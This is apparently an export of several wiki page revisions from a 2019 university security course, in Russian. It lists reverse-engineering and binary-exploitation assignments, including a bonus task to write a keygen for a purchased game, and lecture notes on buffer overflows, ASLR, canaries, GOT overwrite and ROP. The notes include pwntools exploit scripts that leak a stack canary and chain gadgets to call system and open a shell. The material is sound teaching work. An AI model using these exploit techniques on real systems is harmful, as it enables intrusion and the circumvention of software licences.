Разрешается объединяться в группы до трех человек, в исключительных случаях - до четырех.

Чтобы не было ситуации, что несколько разных групп пишут кейген для одной и той же игры, игру нужно предварительно "забронировать", написав мне письмо (mailto:wgh+secsem2019@seclab.cs.msu.ru).

Поскольку это задание обладает значительным элементом рандома, и вы можете неудачно выбрать непосильную игру (код может оказаться безумно сложным, включать в себя антиотладочные механизмы, и т.д.), можно забронировать до 3 различных игр, и сдать то, что получится.

Игры, у которых подробно описан алгоритм проверки ключа где-либо в интернете, не принимаются. Если строго, на момент бронирования игры на первых 5 страницах поиска в Google по запросу "<game name> cd key keygen reverse" не должно быть статьи с описанием алгоритма. По этому критерию сразу отсеиваются игры Half-Life и Starcraft.

Результатом выполнения задания является должен быть отчет в таком же формате, как и в обязательных заданиях. Более качественный и подробный (без доведения до абсурда) отчет будет оцениваться выше.

Оценка выставляется от 300 до бесконечности субъективно в зависимости от сложности проделанной работы и качества отчета. Например, UT2004, разобранный на семинаре, стоил бы где-то 500-600 баллов. Оценка будет выставлена после дедлайна (приблизительная оценка может быть сообщена ранее).

Дедлайн: 23:59, 21 апреля 2019.

== Задания по эксплуатации бинарных уязвимостей ==

Правила такие же, как и в [[Введение в практическую безопасность (2019)/Задания по вебу|заданиях по вебу]]: найдите флаг и сдайте его в [https://dashboard.course.secsem.ru/ принимающую систему]. Писать отчет не требуется.

Дедлайн: 22 апреля 23:59.

=== Основные задания ===

Бинарники можно скачать по этой ссылке: [[Media:2019 pwn tasks.tar.gz]]. Все задания работают на Ubuntu 16.04.

См. также [[/Указания]], где есть советы по подключению к сервисам.

{| class="wikitable"
|-
! Название
! Стоимость
! Хост и порт
|-
| www
| 50
| pwn.tasks.course.secsem.ru 9400
|-
| locked_down
| 75
| pwn.tasks.course.secsem.ru 9000
|-
| easyrop
| 100
| pwn.tasks.course.secsem.ru 9100
|-
| easyrop (harder)
| 125
| pwn.tasks.course.secsem.ru 9101
|-
| ROPN
| 175
| pwn.tasks.course.secsem.ru 9200
|-
| linked_lists
| 175
| pwn.tasks.course.secsem.ru 9300
|}

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

=== Бонусное задание 1 (imgenhancer) ===

В этом задании есть два флага. Ко второй части задания рекомендуется приступать после семинара 26 марта.

* http://imgenhancer.tasks.course.secsem.ru/
* [[Media:2019 pwn imgenhancer.zip]]

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-30T15:56:23Z

WGH: /* Основные задания */ typo

== Задания по реверс-инжинирингу ==

=== Обязательные задания ===
Задания по этой теме реализованы в формате типичного crackme/задания на реверс на task-based CTF.

Дан исполняемый файл для ОС Linux. Нужно подобрать такой ввод, чтобы некая проверка внутри была пройдена. В случае успеха программа будет явно писать фразу в духе "успех".

Для зачисления баллов необходимо написать небольшой отчет о проделанной работе: какие инструменты были использованы, какие алгоритмы проверки ввода используются в задании, каким образом вы это поняли Отчет не обязан быть написан строго формально, но должен быть читаемым и понятным. Отчет нужно отправлять на почту mailto:wgh+secsem2019@seclab.cs.msu.ru. К отчету также необходимо приложить ваше имя/никнейм, которые вы использовали в [https://dashboard.course.secsem.ru/ дэшборде] при сдаче заданий по вебу, чтобы мы могли зачислить вам очки.

Дедлайн: 10 апреля 2019, 23:59 MSK.

; [[Media:2019 reverse task 1.zip]]
: При написании генератора ключей начисляется 150 баллов (генератор должен быть приложен к отчету), при получении одного валидного ключа - 100 баллов.
; [[Media:2019 reverse task 2.zip]]
: При успешном выполнении задания начисляется 150 баллов.

=== Бонусное задание ===
Требуется разреверсить алгоритм проверки лицензионных ключей у компьютерной игры по выбору, и написать генератор ключей<ref>Игра конечно же должна быть законно приобретена вами.</ref>.

Разрешается объединяться в группы до трех человек, в исключительных случаях - до четырех.

Чтобы не было ситуации, что несколько разных групп пишут кейген для одной и той же игры, игру нужно предварительно "забронировать", написав мне письмо (mailto:wgh+secsem2019@seclab.cs.msu.ru).

Поскольку это задание обладает значительным элементом рандома, и вы можете неудачно выбрать непосильную игру (код может оказаться безумно сложным, включать в себя антиотладочные механизмы, и т.д.), можно забронировать до 3 различных игр, и сдать то, что получится.

Игры, у которых подробно описан алгоритм проверки ключа где-либо в интернете, не принимаются. Если строго, на момент бронирования игры на первых 5 страницах поиска в Google по запросу "<game name> cd key keygen reverse" не должно быть статьи с описанием алгоритма. По этому критерию сразу отсеиваются игры Half-Life и Starcraft.

Результатом выполнения задания является должен быть отчет в таком же формате, как и в обязательных заданиях. Более качественный и подробный (без доведения до абсурда) отчет будет оцениваться выше.

Оценка выставляется от 300 до бесконечности субъективно в зависимости от сложности проделанной работы и качества отчета. Например, UT2004, разобранный на семинаре, стоил бы где-то 500-600 баллов. Оценка будет выставлена после дедлайна (приблизительная оценка может быть сообщена ранее).

Дедлайн: 23:59, 21 апреля 2019.

== Задания по эксплуатации бинарных уязвимостей ==

Правила такие же, как и в [[Введение в практическую безопасность (2019)/Задания по вебу|заданиях по вебу]]: найдите флаг и сдайте его в [https://dashboard.course.secsem.ru/ принимающую систему]. Писать отчет не требуется.

=== Основные задания ===

Бинарники можно скачать по этой ссылке: [[Media:2019 pwn tasks.tar.gz]]. Все задания работают на Ubuntu 16.04.

См. также [[/Указания]], где есть советы по подключению к сервисам.

{| class="wikitable"
|-
! Название
! Стоимость
! Хост и порт
|-
| www
| 50
| pwn.tasks.course.secsem.ru 9400
|-
| locked_down
| 75
| pwn.tasks.course.secsem.ru 9000
|-
| easyrop
| 100
| pwn.tasks.course.secsem.ru 9100
|-
| easyrop (harder)
| 125
| pwn.tasks.course.secsem.ru 9101
|-
| ROPN
| 175
| pwn.tasks.course.secsem.ru 9200
|-
| linked_lists
| 175
| pwn.tasks.course.secsem.ru 9300
|}

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

=== Бонусное задание 1 (imgenhancer) ===

В этом задании есть два флага. Ко второй части задания рекомендуется приступать после семинара 26 марта.

* http://imgenhancer.tasks.course.secsem.ru/
* [[Media:2019 pwn imgenhancer.zip]]

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-30T15:55:33Z

WGH: /* Задания по эксплуатации бинарных уязвимостей */ заголовки

== Задания по реверс-инжинирингу ==

=== Обязательные задания ===
Задания по этой теме реализованы в формате типичного crackme/задания на реверс на task-based CTF.

Дан исполняемый файл для ОС Linux. Нужно подобрать такой ввод, чтобы некая проверка внутри была пройдена. В случае успеха программа будет явно писать фразу в духе "успех".

Для зачисления баллов необходимо написать небольшой отчет о проделанной работе: какие инструменты были использованы, какие алгоритмы проверки ввода используются в задании, каким образом вы это поняли Отчет не обязан быть написан строго формально, но должен быть читаемым и понятным. Отчет нужно отправлять на почту mailto:wgh+secsem2019@seclab.cs.msu.ru. К отчету также необходимо приложить ваше имя/никнейм, которые вы использовали в [https://dashboard.course.secsem.ru/ дэшборде] при сдаче заданий по вебу, чтобы мы могли зачислить вам очки.

Дедлайн: 10 апреля 2019, 23:59 MSK.

; [[Media:2019 reverse task 1.zip]]
: При написании генератора ключей начисляется 150 баллов (генератор должен быть приложен к отчету), при получении одного валидного ключа - 100 баллов.
; [[Media:2019 reverse task 2.zip]]
: При успешном выполнении задания начисляется 150 баллов.

=== Бонусное задание ===
Требуется разреверсить алгоритм проверки лицензионных ключей у компьютерной игры по выбору, и написать генератор ключей<ref>Игра конечно же должна быть законно приобретена вами.</ref>.

Разрешается объединяться в группы до трех человек, в исключительных случаях - до четырех.

Чтобы не было ситуации, что несколько разных групп пишут кейген для одной и той же игры, игру нужно предварительно "забронировать", написав мне письмо (mailto:wgh+secsem2019@seclab.cs.msu.ru).

Поскольку это задание обладает значительным элементом рандома, и вы можете неудачно выбрать непосильную игру (код может оказаться безумно сложным, включать в себя антиотладочные механизмы, и т.д.), можно забронировать до 3 различных игр, и сдать то, что получится.

Игры, у которых подробно описан алгоритм проверки ключа где-либо в интернете, не принимаются. Если строго, на момент бронирования игры на первых 5 страницах поиска в Google по запросу "<game name> cd key keygen reverse" не должно быть статьи с описанием алгоритма. По этому критерию сразу отсеиваются игры Half-Life и Starcraft.

Результатом выполнения задания является должен быть отчет в таком же формате, как и в обязательных заданиях. Более качественный и подробный (без доведения до абсурда) отчет будет оцениваться выше.

Оценка выставляется от 300 до бесконечности субъективно в зависимости от сложности проделанной работы и качества отчета. Например, UT2004, разобранный на семинаре, стоил бы где-то 500-600 баллов. Оценка будет выставлена после дедлайна (приблизительная оценка может быть сообщена ранее).

Дедлайн: 23:59, 21 апреля 2019.

== Задания по эксплуатации бинарных уязвимостей ==

Правила такие же, как и в [[Введение в практическую безопасность (2019)/Задания по вебу|заданиях по вебу]]: найдите флаг и сдайте его в [https://dashboard.course.secsem.ru/ принимающую систему]. Писать отчет не требуется.

=== Основные задания ===
и
Бинарники можно скачать по этой ссылке: [[Media:2019 pwn tasks.tar.gz]]. Все задания работают на Ubuntu 16.04.

См. также [[/Указания]], где есть советы по подключению к сервисам.

{| class="wikitable"
|-
! Название
! Стоимость
! Хост и порт
|-
| www
| 50
| pwn.tasks.course.secsem.ru 9400
|-
| locked_down
| 75
| pwn.tasks.course.secsem.ru 9000
|-
| easyrop
| 100
| pwn.tasks.course.secsem.ru 9100
|-
| easyrop (harder)
| 125
| pwn.tasks.course.secsem.ru 9101
|-
| ROPN
| 175
| pwn.tasks.course.secsem.ru 9200
|-
| linked_lists
| 175
| pwn.tasks.course.secsem.ru 9300
|}

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

=== Бонусное задание 1 (imgenhancer) ===

В этом задании есть два флага. Ко второй части задания рекомендуется приступать после семинара 26 марта.

* http://imgenhancer.tasks.course.secsem.ru/
* [[Media:2019 pwn imgenhancer.zip]]

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-30T15:54:05Z

WGH: /* Задания по эксплуатации бинарных уязвимостей */ основные задания

== Задания по реверс-инжинирингу ==

=== Обязательные задания ===
Задания по этой теме реализованы в формате типичного crackme/задания на реверс на task-based CTF.

Дан исполняемый файл для ОС Linux. Нужно подобрать такой ввод, чтобы некая проверка внутри была пройдена. В случае успеха программа будет явно писать фразу в духе "успех".

Для зачисления баллов необходимо написать небольшой отчет о проделанной работе: какие инструменты были использованы, какие алгоритмы проверки ввода используются в задании, каким образом вы это поняли Отчет не обязан быть написан строго формально, но должен быть читаемым и понятным. Отчет нужно отправлять на почту mailto:wgh+secsem2019@seclab.cs.msu.ru. К отчету также необходимо приложить ваше имя/никнейм, которые вы использовали в [https://dashboard.course.secsem.ru/ дэшборде] при сдаче заданий по вебу, чтобы мы могли зачислить вам очки.

Дедлайн: 10 апреля 2019, 23:59 MSK.

; [[Media:2019 reverse task 1.zip]]
: При написании генератора ключей начисляется 150 баллов (генератор должен быть приложен к отчету), при получении одного валидного ключа - 100 баллов.
; [[Media:2019 reverse task 2.zip]]
: При успешном выполнении задания начисляется 150 баллов.

=== Бонусное задание ===
Требуется разреверсить алгоритм проверки лицензионных ключей у компьютерной игры по выбору, и написать генератор ключей<ref>Игра конечно же должна быть законно приобретена вами.</ref>.

Разрешается объединяться в группы до трех человек, в исключительных случаях - до четырех.

Чтобы не было ситуации, что несколько разных групп пишут кейген для одной и той же игры, игру нужно предварительно "забронировать", написав мне письмо (mailto:wgh+secsem2019@seclab.cs.msu.ru).

Поскольку это задание обладает значительным элементом рандома, и вы можете неудачно выбрать непосильную игру (код может оказаться безумно сложным, включать в себя антиотладочные механизмы, и т.д.), можно забронировать до 3 различных игр, и сдать то, что получится.

Игры, у которых подробно описан алгоритм проверки ключа где-либо в интернете, не принимаются. Если строго, на момент бронирования игры на первых 5 страницах поиска в Google по запросу "<game name> cd key keygen reverse" не должно быть статьи с описанием алгоритма. По этому критерию сразу отсеиваются игры Half-Life и Starcraft.

Результатом выполнения задания является должен быть отчет в таком же формате, как и в обязательных заданиях. Более качественный и подробный (без доведения до абсурда) отчет будет оцениваться выше.

Оценка выставляется от 300 до бесконечности субъективно в зависимости от сложности проделанной работы и качества отчета. Например, UT2004, разобранный на семинаре, стоил бы где-то 500-600 баллов. Оценка будет выставлена после дедлайна (приблизительная оценка может быть сообщена ранее).

Дедлайн: 23:59, 21 апреля 2019.

== Задания по эксплуатации бинарных уязвимостей ==

Правила такие же, как и в [[Введение в практическую безопасность (2019)/Задания по вебу|заданиях по вебу]]: найдите флаг и сдайте его в [https://dashboard.course.secsem.ru/ принимающую систему]. Писать отчет не требуется.

Бинарники можно скачать по этой ссылке: [[Media:2019 pwn tasks.tar.gz]]. Все задания работают на Ubuntu 16.04.

См. также [[/Указания]], где есть советы по подключению к сервисам.

{| class="wikitable"
|-
! Название
! Стоимость
! Хост и порт
|-
| www
| 50
| pwn.tasks.course.secsem.ru 9400
|-
| locked_down
| 75
| pwn.tasks.course.secsem.ru 9000
|-
| easyrop
| 100
| pwn.tasks.course.secsem.ru 9100
|-
| easyrop (harder)
| 125
| pwn.tasks.course.secsem.ru 9101
|-
| ROPN
| 175
| pwn.tasks.course.secsem.ru 9200
|-
| linked_lists
| 175
| pwn.tasks.course.secsem.ru 9300
|}

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

=== Бонусное задание 1 (imgenhancer) ===

Правила такие же, как и в [[Введение в практическую безопасность (2019)/Задания по вебу|заданиях по вебу]]: найдите флаг и сдайте его в [https://dashboard.course.secsem.ru/ принимающую систему]. Писать отчет не требуется.

В этом задании есть два флага. Ко второй части задания рекомендуется приступать после семинара 26 марта.

* http://imgenhancer.tasks.course.secsem.ru/
* [[Media:2019 pwn imgenhancer.zip]]

По всем вопросам можно писать на почту mailto:wgh+secsem2019@seclab.cs.msu.ru или в Matrix https://matrix.to/#/@WGH:torlan.ru.

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей/Указания

2019-03-30T15:44:29Z

WGH: как подключаться и подобные мелочи

== Подключение к заданиям ==

Большинство заданий реализованы в виде интерактивных программ, реализующий простой текстовый интерфейс. При подключении к серверу будет автоматически запущен экземпляр программы, и вы сможете взаимодействовать с ним точно так же, как если бы вы запустили программу локально.

В описании заданий указаны имя хоста и порт. Чтобы подключиться к ним интерактивно, вы можете воспользоваться любой из следующих программ:

<pre>
nc $HOST $PORT
socat - "TCP:$HOST:$PORT"
</pre>

В сети BMK_WIFI_FREE нестандартные порты заблокированы, и подключиться к сервисам, к сожалению, не получится.

== Написание эксплоита на pwntools ==

Для написания эксплоитов рекомендуется использовать удобную библиотеку pwntools.

Например, фрагмент экслплоита для задания может выглядеть так:

<pre>
#!/usr/bin/env python2

from pwn import *

import sys

if len(sys.argv) == 3:
# python2 exploit.py HOST PORT
p = remote(sys.argv[1], sys.argv[2])
else:
# python2 exploit.py
# запуск процесса локально для отладки
p = process("./locked_down")

libc = ELF("./libc.so.6")

print "printf offset", libc.sym["printf"]

# подключиться к процессу и поставить breakpoint
# на указанный адрес
gdb.attach(p, """
b * 0xdeadbeef
""")

p.recvuntil("> ") # считывать данные, пока не придет строка "> "
p.sendline("3")
p.recvuntil("Enter password")
p.sendline()
p.recvuntil("Enter contents")
p.send("foobar")

p.interactive() # перейти в интерактивный режим
</pre>

* http://docs.pwntools.com/en/stable/tubes.html
* http://docs.pwntools.com/en/stable/tubes.html#pwnlib.tubes.tube.tube.recvuntil
* http://docs.pwntools.com/en/stable/util/packing.html#module-pwnlib.util.packing
* http://docs.pwntools.com/en/stable/elf/elf.html#example-usage

== Мелочи ==

=== Версия libc ===
Ваша версия libc может не совпадать с той, которая используется на сервере, что
сказывается на смещениях функций.
Чтобы вам не приходилось перебирать возможные версии libc популярных дистрибутивов,
вместе с заданием приложены бинари libc.

Вообще отлаживать с корректной версией libc может быть необязательно: если отличия только
в смещениях функций, то достаточно лишь аккуратно заменить их перед запуском на сервере.
Но иногда отличия более серьезные: например, если вы используете ROP-гаджеты из libc.

Запустить бинарь с чужой версией libc можно таким способом:
<pre>
LD_TRACE_LOADED_OBJECTS=1 LD_LIBRARY_PATH=. ./locked_down # чтобы убедиться, что подгрузилась правильная библиотека
LD_LIBRARY_PATH=. ./locked_down
</pre>

Однако если ваша родная версия libc слишком новая или слишком старая, из-за различий в ld.so
это может не сработать, и программа упадет на запуске.

В таком случае можно порекомендовать запускать всё в виртуалке или докере с приблизительно такой же версией
дистрибутива (<code>ubuntu:16.04</code>).

Файл:2019 pwn tasks.tar.gz

2019-03-30T15:38:59Z

WGH:

Введение в практическую безопасность (2019)/Бинарная эксплуатация

2019-03-27T22:45:03Z

WGH: /* Пример эксплоита */ правильный уровень заголовка

== Уязвимости ==

=== Переполнение буфера ===
Переполнение буфера (buffer overflow) происходит, когда программа не проверяет размер буфера должным образом при записи в него. Например, так делает печально известные функции <code>gets</code>, <code>strcpy</code>, а также такое встречается и в пользовательском коде.

Техника эксплуатации сильно зависит от того, где произошло переполнение.

* Стек - интересными объектами являются адрес возврата функции (для return-to-xxx, ROP), сохраненные регистры (RBP для проведения stack pivot), соседние переменные.
* Глобальные переменные - соседние глобальные переменные, а в случае переполнения назад (underwrite) - GOT.
* Куча - соседние аллокации памяти, а также внутренние структуры данных, используемая аллокатором<ref>https://sourceware.org/glibc/wiki/MallocInternals</ref><ref>https://github.com/shellphish/how2heap</ref><ref>Техники эксплуатации структур данных аллокатора не рассматриваются на этом спецкурсе.</ref>.

=== Buffer over-read ===

Очень похоже по своей сути на переполнение буфера, однако при этом содержимое памяти за пределами буфера выводится пользователю.

Обычно не приводит к чему-либо серьезному само по себе, однако может использоваться для обхода ASLR с целью эксплуатации других уязвимостей. А ещё см. нашумевший баг [[wikipedia:Heartbleed]].

=== Uninitialized memory read ===

Как следует из названия, чтение неинициализованной памяти. Как и в случае buffer over-read, там можно найти интересные данные.

=== Integer overflow ===

Целочисленное переполнение является опасной уззвимостью, когда переполнение происходит при рассчете размера для выделения памяти.

В следующем примере сумма <code>len1+len2</code> может переполниться таким образом, что len1 > len1 + len2 (https://ideone.com/qU4csI):
<pre>
int foo(int fd) {
size_t len1 = read_size(fd);
size_t len2 = read_size(fd);
char *buf = malloc(len1+len2);
read_data(fd, buf, len1);
read_data(fd, buf+len1, len2);
// ...
}
</pre>

Поэтому <code>read_data</code> может записать в буфер больше данных, чем доступно памяти в буфере, и затереть таким образом соседние объекты на куче.

Похожая проблема возникает при умножении и даже при неаккуратном прибавлении константного числа.

== Средства защиты ==
В программах на языках C и C++, скомпилированных современными компиляторами и работающих на современных ОС, присутствует большое число противодействий бинарным уязвимостям (mitigations).

=== No execute (NX) ===

Средства ОС и процессора позволяют гибко настраивать права доступа на страницы виртуальной памяти. Эти права доступа позволяют запрещать выполнять данные как инструкции процессора. Напрмер, даже если записать шеллкод на стек, в память, выделенную через <code>malloc</code> или в статический глобальный буфер, при попытке выполнить этот код произойдет <code>SIGSEGV</code>

На уровне пользовательской программы это реализовано флагом <code>prot</code> в системных вызовах <code>mmap</code> и <code>mprotect</code>. Сам пользовательский код редко использует эти системные вызовы напрямую: ядро системы, динамический загрузчик (<code>ld.so</code>) и libc сами выделяют память с правильными правами доступа.

Фактически это означает, что чтобы в таких условиях добиться выполнения произвольного кода (или хотя бы выходящего за спецификацию исходной программы), придется провести атаку переиспользования кода (code reuse) в том или ином виде. Например, переписать указатель на какую-то безобидную функцую на <code>system</code>.

Посмотреть карту виртуальной памяти запущенного процесса можно при помощи программы <code>pmap</code>, команды <code>info proc mappings</code> в GDB, или <code>vmmap</code> в GDB+PEDA.

* https://en.wikipedia.org/wiki/NX_bit

=== ASLR ===

Чтобы затруднить атаки класса переиспользования кода (code reuse), такие как возврат в libc, адреса стека, кучи, и загрузки библиотек рандомизируются при каждом запуске программы. Это называется address space layout randomization.

Например, если в программе есть уязвимость, позволяющая переписать указатель на функцию, вы не можете записать туда адрес функции <code>system</code> просто потому, что вы не знаете адрес этой функции. Похожая ситуация будет, если есть указатель на какую-то структуру (например, содержащую в себе флаг <code>is_admin</code>): возможно вы и можете создать фейковую структуру с правильными полями на стеке, но вы не знаете, по какому адресу она окажется, чтобы записать этот адрес в тот указатель.

Как и многие другие защиты, ASLR не является абсолютной. Если в программе есть баг, позволяющий читать память за границей массива на стеке, с большой вероятностью вы там найдете адрес, ведущий в libc. Например, функция <code>main</code> возвращается куда-то в недра <code>__libc_start_main</code>, и если получится узнать адрес возврата, то посчитав смещение этого места относительно начала libc (для этой конкретной версии libc!), вы сможете узнать адрес загрузки библиотеки - и, соответственно, адреса всех функций, смещения которых фиксированы относительно базового адреса загрузки.

Начиная с примерно 2018 года большинство дистрибутивов Linux стали компилировать программы в режиме PIE (position-independent executable), позволяющие ОС и загрузчику рандомизировать также адрес загрузки самого бинаря, который до этого был всегда фиксировано <code>0x00400000</code>.

Проверить наличие PIE можно при помощи следующей команды pwntools. ASLR же для стека, кучи и библиотек при этом присутствует в любом случае.

<pre>
$ pwn checksec /bin/bash
[*] '/bin/bash'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://en.wikipedia.org/wiki/Address_space_layout_randomization

=== Stack canary ===
Stack canary (<code>-fstack-protector</code>, stack smashing protector) - один из способов защиты от переполнения буфера на стеке.

При переполнении буфера освовную опасность представляет перезапись адреса возврата функции. От этого канарейка и защищает.

В прологе функции за адресом возврата<ref>Иногда и перед потенциально опасными локальными переменными, как то указатели на функции.</ref> на стек сохраняется специальное секретное значение, которое проверяется при выходе из функции. Если оно изменилось, то значит произошло переполнение буфера на стеке, и программа немедленно завершается, не выполняя инструкцию ret.

В glibc канарейка генерируется один раз при запуске программы, и никогда не меняется. Если есть уязвимость, позволяющая прочесть значение канарейки, то её можно обойти, просто записывая поверх канарейки её значение. Однако алгоритм генерации всегда включает в значение нулевой байт, что может усложнить эксплуатацию при помощи строковых функций типа <code>strcpy</code>.

В HexRays проверка канарейки декомпилируется неправильно. Но всегда, когда вы видите <code>__readfsqword(0x28u)</code>, можете быть увереными, что это оно. Если хотите посмотреть корректный код, смотрите дизассемблер.

* https://wiki.osdev.org/Stack_Smashing_Protector

== Техники эксплуатации ==

=== Перезапись GOT ===
В динамических слинкованных бинарях для вызова фунций из библиотек (libc и другие) используется специальная таблица GOT (global offset table).

Эта таблица содержит адреса библиотечных функций, которые требуются данной программе<ref>Библиотеки тоже могут использовать функции из других библиотек, у них тоже есть такая таблица.</ref>. Эта таблица заполняется динамических загрузчиком (ld.so, dynamic linker/loader). По умолчанию эта таблица заполняется лениво: вместо адресов целевых функций там лежат адреса заглушек, которые вызывают динамический загрузчик, который в свою очередь заносит в таблицу уже адрес нужной функции и передает управление на неё. При последующих вызовах функция уже будет вызываться непосредственно, без загрузчика.

Поскольку такая ленивость предполагает доступ к этой таблице на запись во время работы программы, записи в ней очень удобно переписывать в процессе эксплуатации. Основными претендентами являются функции, принимающие первым аргументом указатель на контролируемую пользователем строку, типа <code>free</code>, <code>strlen</code>, и т.д.: их удобно переписывать на адрес <code>system</code>.

Также бывает полезно читать данные оттуда для получения смещения libc и обхода ASLR таким образом.

Так как GOT обычно находится перед секциями <code>.data</code> и <code>.bss</code>, в эту таблицу можно попасть по отрицательным смещениям относительно глобальных переменных, также через arbitrary read/write по произвольному абсолютному адресу.

Опционально при компиляции можно включить защиту RELRO, которая делает эту таблицу неленивой и недоступной для запись. Уровень защиты можно проверить при помощи checksec (Partial RELRO с точки зрения эксплуатации не отличается от отсутствия RELRO, защиту обеспечивает только Full RELRO):
<pre>
% ~/.local/bin/pwn checksec /bin/cat
[*] '/bin/cat'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough/elf-symbols-got-overwrite

=== Return-oriented programming ===

Return-oriented programming (ROP) - популярная техника эксплуатации переполнения буфера на стеке.

В самом простом варианте эксплуатации такого переполнения переписывается только адрес возврата функции. Однако такое не позволяет вызвать функцию с произвольными параметрами, можно лишь передавать управление на готовые куски кода. Это само по себе неплохо, если есть хорошие места в программе или в библиотеках (см. [https://github.com/david942j/one_gadget one gadget RCE] в libc).

Но можно пойти дальше. Если есть возможность переписать и после адреса возврата, туда можно записать адреса т.н. гаджетов - последовательностей инструкций, заканчивающихся на <code>ret</code>.

Эти гаджеты можно находить при помощи программ ropper, ROPGadget, и других. Эти программы позволяют находить гаджеты, которые не видны при простом дизассемблировании, т.к. как они могут начинаться на середине инструкции:

<pre>
$ ~/.local/bin/pwn disasm -c amd64 5FC3
0: 5f pop rdi
1: c3 ret
$ ~/.local/bin/pwn disasm -c amd64 415FC3
0: 41 5f pop r15
2: c3 ret
</pre>

<pre>
$ ~/.local/bin/ropper --file example_1.5_gets
...
0x0000000000400ba3: pop rdi; ret;
0x0000000000400ba1: pop rsi; pop r15; ret;
...
</pre>

Например, нужно вызвать функцию по адресу <code>0xdeadbeef</code> функцию с аргументами 1 и 2. Тогда на стек, начиная с адреса возврата, нужно записать такие 64-битные числа: <code>0x0000000000400ba3, 0x1, 0x0000000000400ba1, 0x2, 0x1337, 0xdeadbeef</code>. Для понимания, как это работает, нужно отследить как меняется RSP по мере выполнения инструкций <code>ret</code> и <code>pop</code>.

* https://en.wikipedia.org/wiki/Return-oriented_programming
* https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI - какие регистры используются при вызове функций.

==== Пример эксплоита ====

Эксплоит для ./example_1.5_gets:

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

gdb.attach(p,
"b * 0x400B2D"
)

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24

payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x4009B0) # read_line
payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x400B33) # system

p.sendline(payload)

p.sendline("sh")

p.sendline("id")

p.interactive()

</pre>

== Инструменты ==

=== pwntools ===

pwntools - удобная библиотека-фреймворк для написания эксплоитов.

http://docs.pwntools.com/en/stable/index.html

Эксплоит для примера <code>example_1.5_gets</code>, разбираемого на задании ([[Media:2019 pwn samples.zip]]):

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
#context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

#gdb.attach(p) # <- uncomment to enable debugger

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24
payload += p64(0x400B33) # <- try to set it to 0xdeadbeef and see what happens in debugger

p.sendline(payload)

p.interactive()
</pre>

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Бинарная эксплуатация

2019-03-27T21:39:55Z

WGH: integer overflow, GOT overwrite and ROP

== Уязвимости ==

=== Переполнение буфера ===
Переполнение буфера (buffer overflow) происходит, когда программа не проверяет размер буфера должным образом при записи в него. Например, так делает печально известные функции <code>gets</code>, <code>strcpy</code>, а также такое встречается и в пользовательском коде.

Техника эксплуатации сильно зависит от того, где произошло переполнение.

* Стек - интересными объектами являются адрес возврата функции (для return-to-xxx, ROP), сохраненные регистры (RBP для проведения stack pivot), соседние переменные.
* Глобальные переменные - соседние глобальные переменные, а в случае переполнения назад (underwrite) - GOT.
* Куча - соседние аллокации памяти, а также внутренние структуры данных, используемая аллокатором<ref>https://sourceware.org/glibc/wiki/MallocInternals</ref><ref>https://github.com/shellphish/how2heap</ref><ref>Техники эксплуатации структур данных аллокатора не рассматриваются на этом спецкурсе.</ref>.

=== Buffer over-read ===

Очень похоже по своей сути на переполнение буфера, однако при этом содержимое памяти за пределами буфера выводится пользователю.

Обычно не приводит к чему-либо серьезному само по себе, однако может использоваться для обхода ASLR с целью эксплуатации других уязвимостей. А ещё см. нашумевший баг [[wikipedia:Heartbleed]].

=== Uninitialized memory read ===

Как следует из названия, чтение неинициализованной памяти. Как и в случае buffer over-read, там можно найти интересные данные.

=== Integer overflow ===

Целочисленное переполнение является опасной уззвимостью, когда переполнение происходит при рассчете размера для выделения памяти.

В следующем примере сумма <code>len1+len2</code> может переполниться таким образом, что len1 > len1 + len2 (https://ideone.com/qU4csI):
<pre>
int foo(int fd) {
size_t len1 = read_size(fd);
size_t len2 = read_size(fd);
char *buf = malloc(len1+len2);
read_data(fd, buf, len1);
read_data(fd, buf+len1, len2);
// ...
}
</pre>

